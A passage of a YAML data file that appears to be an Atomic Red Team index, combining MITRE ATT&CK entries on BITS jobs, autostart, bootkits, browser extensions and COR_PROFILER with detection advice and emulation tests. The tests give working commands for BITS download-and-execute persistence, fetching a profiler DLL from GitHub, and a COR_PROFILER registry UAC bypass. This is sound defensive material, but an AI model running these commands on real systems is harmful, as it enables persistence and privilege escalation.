- source_name: Microsoft Configure LSA - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T15:11:25.821Z' - created: '2020-01-24T14:54:42.757Z' - x_mitre_platforms: - - Windows - x_mitre_data_sources: - - DLL monitoring - - Windows Registry - - Loaded DLLs - x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys. - Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 - R2 may generate events when unsigned DLLs try to load into the LSA by setting - the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber - 2014) (Citation: Microsoft Configure LSA)' - x_mitre_permissions_required: - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1197: - technique: - id: attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: BITS Jobs - description: |- - Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM). (Citation: Microsoft COM) (Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. 
- - The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft BITS) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. (Citation: Microsoft BITSAdmin) - - Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. (Citation: CTU BITS Malware June 2016) (Citation: Mondok Windows PiggyBack BITS May 2007) (Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). (Citation: PaloAlto UBoatRAT Nov 2017) (Citation: CTU BITS Malware June 2016) - - BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). (Citation: CTU BITS Malware June 2016) - external_references: - - source_name: mitre-attack - external_id: T1197 - url: https://attack.mitre.org/techniques/T1197 - - url: https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx - description: Microsoft. (n.d.). Component Object Model (COM). Retrieved November - 22, 2017. - source_name: Microsoft COM - - url: https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx - description: Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved - January 12, 2018. - source_name: Microsoft BITS - - url: https://msdn.microsoft.com/library/aa362813.aspx - description: Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018. - source_name: Microsoft BITSAdmin - - url: https://www.secureworks.com/blog/malware-lingers-with-bits - description: Counter Threat Unit Research Team. (2016, June 6). Malware Lingers - with BITS. 
Retrieved January 12, 2018. - source_name: CTU BITS Malware June 2016 - - url: https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/ - description: Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background - Intelligent Transfer Service. Retrieved January 12, 2018. - source_name: Mondok Windows PiggyBack BITS May 2007 - - url: https://www.symantec.com/connect/blogs/malware-update-windows-update - description: Florio, E. (2007, May 9). Malware Update with Windows Update. - Retrieved January 12, 2018. - source_name: Symantec BITS May 2007 - - url: https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/ - description: Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. - Retrieved January 12, 2018. - source_name: PaloAlto UBoatRAT Nov 2017 - - url: https://technet.microsoft.com/library/dd939934.aspx - description: Microsoft. (2011, July 19). Issues with BITS. Retrieved January - 12, 2018. - source_name: Microsoft Issues with BITS July 2011 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-25T23:28:10.049Z' - created: '2018-04-18T17:59:24.739Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows - x_mitre_permissions_required: - - User - - Administrator - - SYSTEM - x_mitre_detection: |- - BITS runs as a service and its status can be checked with the Sc query utility (sc query bits). (Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose). 
(Citation: Microsoft BITS) - - Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options) (Citation: Microsoft BITS)Admin and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database. (Citation: CTU BITS Malware June 2016) - - Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account). (Citation: Microsoft BITS) - x_mitre_defense_bypassed: - - Firewall - - Host forensic analysis - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - Packet capture - - Windows event logs - x_mitre_contributors: - - Ricardo Dias - - Red Canary - x_mitre_version: '1.1' - identifier: T1197 - atomic_tests: - - name: Bitsadmin Download (cmd) - auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421 - description: | - This test simulates an adversary leveraging bitsadmin.exe to download - and execute a payload - supported_platforms: - - windows - input_arguments: - remote_file: - description: Remote file to download - type: url - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md - local_file: - description: Local file path to save downloaded file - type: path - default: "%temp%\\bitsadmin1_flag.ps1" - executor: - command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} - #{local_file} - -' - cleanup_command: 'del #{local_file} >nul 2>&1 - -' - name: command_prompt - - name: Bitsadmin Download (PowerShell) - auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc - description: | - This test simulates an adversary 
leveraging bitsadmin.exe to download - and execute a payload leveraging PowerShell - - Upon execution you will find a github markdown file downloaded to the Temp directory - supported_platforms: - - windows - input_arguments: - remote_file: - description: Remote file to download - type: url - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md - local_file: - description: Local file path to save downloaded file - type: path - default: "$env:TEMP\\bitsadmin2_flag.ps1" - executor: - command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination - #{local_file} - -' - cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - -' - name: powershell - - name: Persist, Download, & Execute - auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae - description: | - This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps. - Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable. - This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS" - This job will remain in the BITS queue until complete or for up to 90 days by default if not removed. 
- supported_platforms: - - windows - input_arguments: - command_path: - description: Path of command to execute - type: path - default: C:\Windows\system32\notepad.exe - bits_job_name: - description: Name of BITS job - type: string - default: AtomicBITS - local_file: - description: Local file path to save downloaded file - type: path - default: "%temp%\\bitsadmin3_flag.ps1" - remote_file: - description: Remote file to download - type: url - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md - executor: - command: | - bitsadmin.exe /create #{bits_job_name} - bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} - bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} "" - bitsadmin.exe /resume #{bits_job_name} - timeout 5 - bitsadmin.exe /complete #{bits_job_name} - cleanup_command: 'del #{local_file} >nul 2>&1 - -' - name: command_prompt - - name: Bits download using desktopimgdownldr.exe (cmd) - auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 - description: "This test simulates using desktopimgdownldr.exe to download a - malicious file\ninstead of a desktop or lockscreen background img. The process - that actually makes \nthe TCP connection and creates the file on the disk - is a svchost process (“-k netsvc -p -s BITS”) \nand not desktopimgdownldr.exe. 
- See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\n" - supported_platforms: - - windows - input_arguments: - remote_file: - description: Remote file to download - type: url - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md - download_path: - description: Local file path to save downloaded file - type: path - default: SYSTEMROOT=C:\Windows\Temp - cleanup_path: - description: path to delete file as part of cleanup_command - type: path - default: C:\Windows\Temp\Personalization\LockScreenImage - cleanup_file: - description: file to remove as part of cleanup_command - type: string - default: "*.md" - executor: - command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} - /eventName:desktopimgdownldr - -' - cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >null 2>&1 - -' - name: command_prompt - T1547: - technique: - id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf - description: |- - Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. - - Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. 
- name: Boot or Logon Autostart Execution - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547 - url: https://attack.mitre.org/techniques/T1547 - - external_id: CAPEC-564 - source_name: capec - url: https://capec.mitre.org/data/definitions/564.html - - url: http://msdn.microsoft.com/en-us/library/aa376977 - description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November - 12, 2014. - source_name: Microsoft Run Key - - url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx - description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1, - 2017. - source_name: MSDN Authentication Packages - - url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx - description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. - source_name: Microsoft TimeProvider - - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order - description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, - Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' - source_name: Cylance Reg Persistence Sept 2013 - - source_name: Linux Kernel Programming - url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf - description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel - Module Programming Guide. Retrieved April 6, 2018. - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. 
- source_name: TechNet Autoruns - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-09T16:05:36.772Z' - created: '2020-01-23T17:46:59.535Z' - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_detection: "Monitor for additions or modifications of mechanisms that - could be used to trigger autostart execution, such as relevant additions to - the Registry. Look for changes that are not correlated with known updates, - patches, or other planned administrative activity. Tools such as Sysinternals - Autoruns may also be used to detect system autostart configuration changes - that could be attempts at persistence.(Citation: TechNet Autoruns) Changes - to some autostart configuration settings may happen under normal conditions - when legitimate software is installed. \n\nSuspicious program execution as - autostart programs may show up as outlier processes that have not been seen - before when compared against historical data.To increase confidence of malicious - activity, data and events should not be viewed in isolation, but as part of - a chain of behavior that could lead to other activities, such as network connections - made for Command and Control, learning details about the environment through - Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically - looking for DLLs that are not recognized or not normally loaded into a process. - Look for abnormal process behavior that may be due to a process loading a - malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line - parameters involved in kernel modification or driver installation." 
- x_mitre_permissions_required: - - User - - Administrator - - root - x_mitre_is_subtechnique: false - x_mitre_version: '1.1' - atomic_tests: [] - T1037: - technique: - id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Boot or Logon Initialization Scripts - description: "Adversaries may use scripts automatically executed at boot or - logon initialization to establish persistence. Initialization scripts can - be used to perform administrative functions, which may often execute other - programs or send information to an internal logging server. These scripts - can vary based on operating system and whether applied locally or remotely. - \ \n\nAdversaries may use these scripts to maintain persistence on a single - system. Depending on the access configuration of the logon scripts, either - local credentials or an administrator account may be necessary. \n\nAn adversary - may also be able to escalate their privileges since some boot or logon initialization - scripts run with higher privileges." - external_references: - - source_name: mitre-attack - external_id: T1037 - url: https://attack.mitre.org/techniques/T1037 - - external_id: CAPEC-564 - source_name: capec - url: https://capec.mitre.org/data/definitions/564.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-08-03T16:47:37.240Z' - created: '2017-05-31T21:30:38.910Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - macOS - - Windows - - Linux - x_mitre_detection: Monitor logon scripts for unusual access by abnormal users - or at abnormal times. Look for files added or modified by unusual accounts - outside of normal administration duties. 
Monitor running process for actions - that could be indicative of abnormal programs or executables running upon - logon. - x_mitre_data_sources: - - File monitoring - - Process monitoring - x_mitre_version: '2.1' - atomic_tests: [] - T1542.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1542.003 - url: https://attack.mitre.org/techniques/T1542/003 - - external_id: CAPEC-552 - source_name: capec - url: https://capec.mitre.org/data/definitions/552.html - - source_name: Mandiant M Trends 2016 - url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf - description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved - March 5, 2019. - - url: http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion - description: Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? - (Infographic). Retrieved November 13, 2014. - source_name: Lau 2011 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Bootkit - description: |- - Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. - - A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011) - - The MBR passes control of the boot process to the VBR. 
Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code. - id: attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-17T19:47:14.338Z' - created: '2019-12-19T21:05:38.123Z' - x_mitre_defense_bypassed: - - Host intrusion prevention systems - - Anti-virus - - File monitoring - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: Perform integrity checking on MBR and VBR. Take snapshots - of MBR and VBR and compare against known good samples. Report changes to MBR - and VBR as they occur for indicators of suspicious activity and further analysis. - x_mitre_data_sources: - - VBR - - MBR - - API monitoring - x_mitre_platforms: - - Linux - - Windows - atomic_tests: [] - T1176: - technique: - id: attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Browser Extensions - description: |- - Adversaries may abuse Internet browser extensions to establish persistence access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access. (Citation: Wikipedia Browser Extension) (Citation: Chrome Extensions Definition) - - Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. 
Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners. (Citation: Malicious Chrome Extension Numbers) Once the extension is installed, it can browse to websites in the background, (Citation: Chrome Extension Crypto Miner) (Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials) (Citation: Banker Google Chrome Extension Steals Creds) (Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. - - There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions. (Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control (Citation: Chrome Extension C2 Malware). - external_references: - - source_name: mitre-attack - external_id: T1176 - url: https://attack.mitre.org/techniques/T1176 - - url: https://en.wikipedia.org/wiki/Browser_extension - description: Wikipedia. (2017, October 8). Browser Extension. Retrieved January - 11, 2018. - source_name: Wikipedia Browser Extension - - url: https://developer.chrome.com/extensions - description: Chrome. (n.d.). What are Extensions?. Retrieved November 16, - 2017. - source_name: Chrome Extensions Definition - - url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf - description: Jagpal, N., et al. (2015, August). Trends and Lessons from Three - Years Fighting Malicious Extensions. Retrieved November 17, 2017. - source_name: Malicious Chrome Extension Numbers - - url: https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/ - description: Brinkmann, M. (2017, September 19). First Chrome extension with - JavaScript Crypto Miner detected. Retrieved November 16, 2017. 
- source_name: Chrome Extension Crypto Miner - - url: https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses - description: De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME - EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL - BUSINESSES. Retrieved January 17, 2018. - source_name: ICEBRG Chrome Extensions - - url: https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/ - description: Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. - Retrieved November 18, 2017. - source_name: Banker Google Chrome Extension Steals Creds - - url: https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/) - description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension - Steals All Posted Data. Retrieved November 16, 2017. - source_name: Catch All Chrome Extension - - url: https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/ - description: 'Vachon, F., Faou, M. (2017, July 20). Stantinko: A massive adware - campaign operating covertly since 2012. Retrieved November 16, 2017.' - source_name: Stantinko Botnet - - url: https://kjaer.io/extension-malware/ - description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might - get hacked by a Chrome extension. Retrieved November 22, 2017.' 
- source_name: Chrome Extension C2 Malware - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-25T23:36:30.565Z' - created: '2018-01-16T16:13:52.465Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_permissions_required: - - User - x_mitre_detection: |- - Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates. - - Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation. - x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process use of network - - Process monitoring - - Browser extensions - x_mitre_contributors: - - Justin Warner, ICEBRG - x_mitre_version: '1.1' - identifier: T1176 - atomic_tests: - - name: Chrome (Developer Mode) - auto_generated_guid: 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 - description: Turn on Chrome developer mode and Load Extension found in the src - directory - supported_platforms: - - linux - - windows - - macos - executor: - steps: | - 1. Navigate to [chrome://extensions](chrome://extensions) and - tick 'Developer Mode'. - - 2. Click 'Load unpacked extension...' and navigate to - [Browser_Extension](../t1176/src/) - - 3. Click 'Select' - name: manual - - name: Chrome (Chrome Web Store) - auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f - description: Install the "Minimum Viable Malicious Extension" Chrome extension - supported_platforms: - - linux - - windows - - macos - executor: - steps: | - 1. 
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend - in Chrome - - 2. Click 'Add to Chrome' - name: manual - - name: Firefox - auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 - description: 'Create a file called test.wma, with the duration of 30 seconds - -' - supported_platforms: - - linux - - windows - - macos - executor: - steps: | - 1. Navigate to [about:debugging](about:debugging) and - click "Load Temporary Add-on" - - 2. Navigate to [manifest.json](./src/manifest.json) - - 3. Then click 'Open' - name: manual - - name: Edge Chromium Addon - VPN - auto_generated_guid: 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 - description: 'Adversaries may use VPN extensions in an attempt to hide traffic - sent from a compromised host. This will install one (of many) available VPNS - in the Edge add-on store. - -' - supported_platforms: - - windows - - macos - executor: - steps: | - 1. Navigate to https://microsoftedge.microsoft.com/addons/detail/fjnehcbecaggobjholekjijaaekbnlgj - in Edge Chromium - - 2. Click 'Get' - name: manual - T1574.012: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.012 - url: https://attack.mitre.org/techniques/T1574/012 - - source_name: Microsoft Profiling Mar 2017 - url: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview - description: Microsoft. (2017, March 30). Profiling Overview. Retrieved June - 24, 2020. - - source_name: Microsoft COR_PROFILER Feb 2013 - url: https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100) - description: Microsoft. (2013, February 4). Registry-Free Profiler Startup - and Attach. Retrieved June 24, 2020. - - source_name: RedCanary Mockingbird May 2020 - url: https://redcanary.com/blog/blue-mockingbird-cryptominer/ - description: Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved - May 26, 2020. 
- - source_name: Red Canary COR_PROFILER May 2020 - url: https://redcanary.com/blog/cor_profiler-for-persistence/ - description: Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation - for persistence. Retrieved June 24, 2020. - - source_name: Almond COR_PROFILER Apr 2019 - url: https://offsec.almond.consulting/UAC-bypass-dotnet.html - description: Almond. (2019, April 30). UAC bypass via elevated .NET applications. - Retrieved June 24, 2020. - - source_name: GitHub OmerYa Invisi-Shell - url: https://github.com/OmerYa/Invisi-Shell - description: Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, - 2020. - - source_name: subTee .NET Profilers May 2017 - url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html - description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET - Profilers. Retrieved June 24, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: COR_PROFILER - description: |- - Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013) - - The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. 
A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013) - - Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017) - id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-06-26T16:09:58.920Z' - created: '2020-06-24T22:30:55.843Z' - x_mitre_detection: 'For detecting system and user scope abuse of the COR_PROFILER, - monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and - COR_PROFILER_PATH that correspond to system and user environment variables - that do not correlate to known developer tools. Extra scrutiny should be placed - on suspicious modification of these Registry keys by command line tools like - wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring - for command-line arguments indicating a change to COR_PROFILER variables may - aid in detection. 
For system, user, and process scope abuse of the COR_PROFILER, - monitor for new suspicious unmanaged profiling DLLs loading into .NET processes - shortly after the CLR causing abnormal process behavior.(Citation: Red Canary - COR_PROFILER May 2020) Consider monitoring for DLL files that are associated - with COR_PROFILER environment variables.' - x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_contributors: - - Jesse Brown, Red Canary - x_mitre_platforms: - - Windows - identifier: T1574.012 - atomic_tests: - - name: User scope COR_PROFILER - auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a - description: | - Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). - The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. - Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. - If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, - the notepad process will not execute with high integrity. 
- - Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - supported_platforms: - - windows - input_arguments: - file_name: - description: unmanaged profiler DLL - type: Path - default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" - executor: - command: | - Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan - New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null - Write-Host "executing eventvwr.msc" -ForegroundColor Cyan - START MMC.EXE EVENTVWR.MSC - cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\" - -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment - -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty - -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore - | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" - -Force -ErrorAction Ignore | Out-Null\n" - name: powershell 
